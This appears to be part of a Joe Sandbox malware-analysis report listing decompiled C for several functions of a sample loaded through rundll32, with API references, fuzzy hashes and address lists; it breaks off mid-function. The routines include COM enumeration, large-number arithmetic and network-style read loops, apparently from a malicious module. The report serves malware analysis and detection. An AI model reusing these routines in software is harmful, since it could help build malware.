                                          • Opcode ID: e50d2604e0ae2684c58b9050e1dbdd9e881c0d49d139de9e9c021f21ceb131f5
                                          • Instruction ID: d2132c960e790902d9d7f9564c31b37e5753ce2ecf7483866236eee6583f730a
                                          • Opcode Fuzzy Hash: e50d2604e0ae2684c58b9050e1dbdd9e881c0d49d139de9e9c021f21ceb131f5
                                          • Instruction Fuzzy Hash: A2F081B06403429BE7108F74F80AF397B6CE748729F40F11AE94ACB1E0D678D851CB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043591B5, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E043591B5(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x435d2a4; // 0x251a5a8
					_t5 = _t103 + 0x435e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x435c298);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x435d2a4; // 0x251a5a8
												_t28 = _t109 + 0x435e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x435d2a4; // 0x251a5a8
														_t33 = _t79 + 0x435e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                          0x043591ba
                                          0x043591c3
                                          0x043591c4
                                          0x043591c8
                                          0x043591ce
                                          0x043591d4
                                          0x043591dd
                                          0x043591e3
                                          0x043591ed
                                          0x043591ef
                                          0x043591f5
                                          0x043591fa
                                          0x04359205
                                          0x0435920b
                                          0x04359210
                                          0x04359332
                                          0x04359216
                                          0x04359216
                                          0x04359223
                                          0x04359229
                                          0x0435922f
                                          0x04359233
                                          0x04359239
                                          0x04359246
                                          0x0435924a
                                          0x04359250
                                          0x04359253
                                          0x0435925b
                                          0x0435925c
                                          0x04359260
                                          0x04359264
                                          0x04359267
                                          0x0435926a
                                          0x04359270
                                          0x04359279
                                          0x0435927f
                                          0x04359280
                                          0x04359283
                                          0x04359284
                                          0x04359285
                                          0x0435928d
                                          0x0435928e
                                          0x0435928f
                                          0x04359291
                                          0x04359295
                                          0x04359299
                                          0x00000000
                                          0x00000000
                                          0x0435929f
                                          0x043592a8
                                          0x043592ae
                                          0x043592b8
                                          0x043592bc
                                          0x043592be
                                          0x043592cb
                                          0x043592cf
                                          0x043592d7
                                          0x043592dc
                                          0x043592ee
                                          0x043592f0
                                          0x043592f6
                                          0x043592f6
                                          0x043592ff
                                          0x043592ff
                                          0x04359301
                                          0x04359307
                                          0x04359307
                                          0x0435930a
                                          0x04359310
                                          0x04359313
                                          0x0435931c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0435931c
                                          0x04359270
                                          0x0435926a
                                          0x04359253
                                          0x04359322
                                          0x04359322
                                          0x04359328
                                          0x04359328
                                          0x0435932e
                                          0x0435932e
                                          0x04359337
                                          0x0435933d
                                          0x0435933d
                                          0x043591fa
                                          0x04359346

                                          APIs
                                          • SysAllocString.OLEAUT32(0435C298), ref: 04359205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 043592E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 043592FF
                                          • SysFreeString.OLEAUT32(?), ref: 0435932E
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: 770982b9f7b30b7b8b36d2a75f714afa9b6cd8d641bb61e4cc4d1d6cd93c2a36
                                          • Instruction ID: 632f6daee254eb19b0a1fa2ebf04f2b7d8179d3655b26d269a00999747c15757
                                          • Opcode Fuzzy Hash: 770982b9f7b30b7b8b36d2a75f714afa9b6cd8d641bb61e4cc4d1d6cd93c2a36
                                          • Instruction Fuzzy Hash: 17513E75D00619EFCB01DFA8C888DAEB7B9FF89704B149594ED15EB260D731AD41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04357664, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E04357664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E043548F0(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E0435748A(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04357074(_t101,  &_v236, _a8, _t96 - _t81);
					E04357074(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E0435748A(_t101, 0x435d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E0435748A(_a16, _a4);
						E04352FED(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0435B088();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0435B082();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04356FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E043515CE(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E0435687D(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x435d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                          0x04357667
                                          0x04357673
                                          0x04357679
                                          0x0435767e
                                          0x04357682
                                          0x043577df
                                          0x043577e3
                                          0x043577e3
                                          0x04357688
                                          0x0435768c
                                          0x04357690
                                          0x04357693
                                          0x0435769e
                                          0x043576a4
                                          0x043576a9
                                          0x043576ac
                                          0x043576c6
                                          0x043576d2
                                          0x043576db
                                          0x043576e5
                                          0x043576ea
                                          0x043576ec
                                          0x043576ef
                                          0x0435779d
                                          0x043577a3
                                          0x043577b4
                                          0x043577c7
                                          0x043577d7
                                          0x00000000
                                          0x043577dc
                                          0x043576f8
                                          0x043576ff
                                          0x04357703
                                          0x04357709
                                          0x0435770b
                                          0x0435770d
                                          0x0435770f
                                          0x04357711
                                          0x0435771b
                                          0x04357720
                                          0x04357722
                                          0x04357724
                                          0x04357725
                                          0x04357726
                                          0x04357727
                                          0x0435772e
                                          0x04357735
                                          0x04357738
                                          0x04357738
                                          0x04357705
                                          0x04357705
                                          0x04357705
                                          0x04357740
                                          0x04357748
                                          0x04357751
                                          0x04357756
                                          0x04357756
                                          0x0435775b
                                          0x00000000
                                          0x00000000
                                          0x0435775d
                                          0x04357760
                                          0x0435776a
                                          0x00000000
                                          0x00000000
                                          0x0435776c
                                          0x0435776c
                                          0x04357776
                                          0x04357756
                                          0x0435775b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0435775b
                                          0x04357780
                                          0x04357783
                                          0x04357786
                                          0x0435778d
                                          0x0435778d
                                          0x0435779a
                                          0x00000000
                                          0x0435779a
                                          0x04357695
                                          0x04357699
                                          0x0435769a
                                          0x0435769c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0435769c
                                          0x00000000

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04357711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04357727
                                          • memset.NTDLL ref: 043577C7
                                          • memset.NTDLL ref: 043577D7
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: fc7986436fb3f768c31ec93b56b5b21b5b73d331461e56c61e339b689ace8865
                                          • Instruction ID: ac25fb502f065a52021fdbed9bdbe7c745ccca9f848c2b726e37121368d80877
                                          • Opcode Fuzzy Hash: fc7986436fb3f768c31ec93b56b5b21b5b73d331461e56c61e339b689ace8865
                                          • Instruction Fuzzy Hash: 9E419771A00259ABEB10EFA8DC40FEE7774EF44314F109529FD16A71A0EB71BE448B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0435A96C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 0435A97E
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • ResetEvent.KERNEL32(?), ref: 0435A9F2
                                          • GetLastError.KERNEL32 ref: 0435AA15
                                          • GetLastError.KERNEL32 ref: 0435AAC0
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: 4db777a99f4b46a69fb8c4ef21f77dc3b6029ae2fb3ab48fd03b8275b19c4464
                                          • Instruction ID: 453fb6e83e09e7439d15ddfb403ad40ded4109eb0e62bdecbde9c1092e616231
                                          • Opcode Fuzzy Hash: 4db777a99f4b46a69fb8c4ef21f77dc3b6029ae2fb3ab48fd03b8275b19c4464
                                          • Instruction Fuzzy Hash: 44418171500704BFE731AFA5CD48E6B7BBDEF48714F146A19F952D10A0D734AA44DA20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04358F08, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E04358F08(void* __eax) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x435d138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x435d168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E043558BE(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x435d138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E0435147E(_v16);
							if(_t58 == 0) {
								_t58 = E043516DB(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E04359D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E04359D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                          0x04358f17
                                          0x04358f1c
                                          0x04358f1e
                                          0x04358f23
                                          0x04358f24
                                          0x04358f29
                                          0x04358f2a
                                          0x04358f35
                                          0x04358f66
                                          0x04358f6b
                                          0x0435902e
                                          0x04359031
                                          0x04359037
                                          0x04359037
                                          0x04358f78
                                          0x04358f80
                                          0x0435902b
                                          0x00000000
                                          0x0435902b
                                          0x04358f8b
                                          0x04358f90
                                          0x04358f95
                                          0x0435901d
                                          0x0435901e
                                          0x0435901e
                                          0x04359024
                                          0x00000000
                                          0x04359024
                                          0x04358f9b
                                          0x04358f9d
                                          0x04358fa3
                                          0x04358fa4
                                          0x04358fa4
                                          0x04358fa7
                                          0x04358faa
                                          0x04358fb0
                                          0x04358fb5
                                          0x04358fb6
                                          0x04358fbb
                                          0x04358fbe
                                          0x04358fc9
                                          0x00000000
                                          0x00000000
                                          0x04358fd1
                                          0x04358fd9
                                          0x04359002
                                          0x04359005
                                          0x0435900c
                                          0x04359017
                                          0x04359017
                                          0x00000000
                                          0x0435900c
                                          0x04358fe5
                                          0x04358fe9
                                          0x00000000
                                          0x00000000
                                          0x04358feb
                                          0x04358ff0
                                          0x00000000
                                          0x00000000
                                          0x04358ff2
                                          0x04358ff2
                                          0x04358ff7
                                          0x00000000
                                          0x00000000
                                          0x04358ff9
                                          0x04358ffa
                                          0x04358ffd
                                          0x04358ffd
                                          0x04358fa4
                                          0x04358f3d
                                          0x04358f45
                                          0x04358f5e
                                          0x04358f60
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04358f60
                                          0x04358f51
                                          0x04358f55
                                          0x00000000
                                          0x00000000
                                          0x04358f5b
                                          0x00000000

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 04358F1E
                                          • GetLastError.KERNEL32 ref: 04358F37
                                            • Part of subcall function 04359D3A: WaitForMultipleObjects.KERNEL32(00000002,0435AA33,00000000,0435AA33,?,?,?,0435AA33,0000EA60), ref: 04359D55
                                          • ResetEvent.KERNEL32(?), ref: 04358FB0
                                          • GetLastError.KERNEL32 ref: 04358FCB
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: 1172ea4aea1a44cc57bef1bb39a5d67c512948ae1454dc72801b17ceceae1550
                                          • Instruction ID: 5473244404a55e58b0b6ac97aa4b2bee1ffe3c913af8037c967d520b9e17d928
                                          • Opcode Fuzzy Hash: 1172ea4aea1a44cc57bef1bb39a5d67c512948ae1454dc72801b17ceceae1550
                                          • Instruction Fuzzy Hash: 24318172A00604EBDB219FA4CC44F6E77BDEF8C364F155928E951A71A0EB70F9419B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043572F2, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E043572F2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x435d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x435d2a4; // 0x251a5a8
				_t3 = _t8 + 0x435e836; // 0x61636f4c
				_t25 = 0;
				_t30 = E04356AF7(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x435d2a8, 1, 0, _t30);
					E0435147E(_t30);
				}
				_t12 =  *0x435d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E043556A2() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04351493(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x435d110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04357827(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                          0x043572f3
                                          0x043572fa
                                          0x04357304
                                          0x04357308
                                          0x0435730e
                                          0x0435731d
                                          0x04357324
                                          0x04357328
                                          0x0435733a
                                          0x0435733c
                                          0x0435733c
                                          0x04357341
                                          0x04357348
                                          0x0435739f
                                          0x0435739f
                                          0x043573a5
                                          0x043573a7
                                          0x043573a7
                                          0x043573b1
                                          0x043573b5
                                          0x043573c7
                                          0x043573c7
                                          0x043573cb
                                          0x043573d1
                                          0x043573d1
                                          0x00000000
                                          0x04357361
                                          0x04357366
                                          0x0435736e
                                          0x04357372
                                          0x04357376
                                          0x04357376
                                          0x04357383
                                          0x04357387
                                          0x0435738b
                                          0x043573e0
                                          0x043573e6
                                          0x043573e6
                                          0x04357399
                                          0x0435739d
                                          0x043573d4
                                          0x043573d6
                                          0x043573d9
                                          0x043573d9
                                          0x00000000
                                          0x043573d6
                                          0x0435739d
                                          0x00000000
                                          0x04357387

                                          APIs
                                            • Part of subcall function 04356AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04352098,74666F53,00000000,?,0435D00C,?,?), ref: 04356B2D
                                            • Part of subcall function 04356AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 04356B51
                                            • Part of subcall function 04356AF7: lstrcat.KERNEL32(00000000,00000000), ref: 04356B59
                                          • CreateEventA.KERNEL32(0435D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0435555B,?,?,?), ref: 04357333
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,0435555B,00000000,00000000,?,00000000,?,0435555B,?,?,?), ref: 04357393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0435555B,?,?,?), ref: 043573C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0435555B,?,?,?), ref: 043573D9
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: e797d3c765af53368d57eb7834feb915374c6273948e9332acadc1e7352b8e8a
                                          • Instruction ID: 6c774b48018a67507f3d02bc74ddc86a1b14cc0d3982a8727655632945f32d7c
                                          • Opcode Fuzzy Hash: e797d3c765af53368d57eb7834feb915374c6273948e9332acadc1e7352b8e8a
                                          • Instruction Fuzzy Hash: 2A21EE726003429BDB315E68A884E6F73ADEF88B24F067235FD15DB160DB64E80186D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0435A1F1, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E0435A1F1(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x435d140; // 0x435ad41
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E043558BE(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E0435147E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04359D3A( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                          0x0435a1f1
                                          0x0435a1f1
                                          0x0435a1fb
                                          0x0435a201
                                          0x0435a204
                                          0x0435a208
                                          0x0435a20e
                                          0x0435a213
                                          0x0435a22c
                                          0x0435a22f
                                          0x0435a233
                                          0x0435a237
                                          0x0435a238
                                          0x0435a23d
                                          0x0435a240
                                          0x0435a247
                                          0x0435a24e
                                          0x0435a2a1
                                          0x0435a2a7
                                          0x0435a2ad
                                          0x0435a2e8
                                          0x0435a2ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0435a2ad
                                          0x0435a254
                                          0x00000000
                                          0x0435a25b
                                          0x0435a269
                                          0x0435a26c
                                          0x0435a26f
                                          0x0435a27b
                                          0x0435a27f
                                          0x0435a2e1
                                          0x0435a281
                                          0x0435a284
                                          0x0435a288
                                          0x0435a289
                                          0x0435a28a
                                          0x0435a28c
                                          0x0435a293
                                          0x0435a2d1
                                          0x0435a2dc
                                          0x0435a295
                                          0x0435a298
                                          0x0435a29c
                                          0x0435a29c
                                          0x0435a293
                                          0x00000000
                                          0x0435a27f
                                          0x0435a254
                                          0x0435a218
                                          0x0435a21e
                                          0x0435a221
                                          0x0435a226
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0435a2b6
                                          0x0435a2be
                                          0x0435a2c3
                                          0x0435a2c6
                                          0x00000000

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 0435A208
                                          • SetEvent.KERNEL32(?), ref: 0435A218
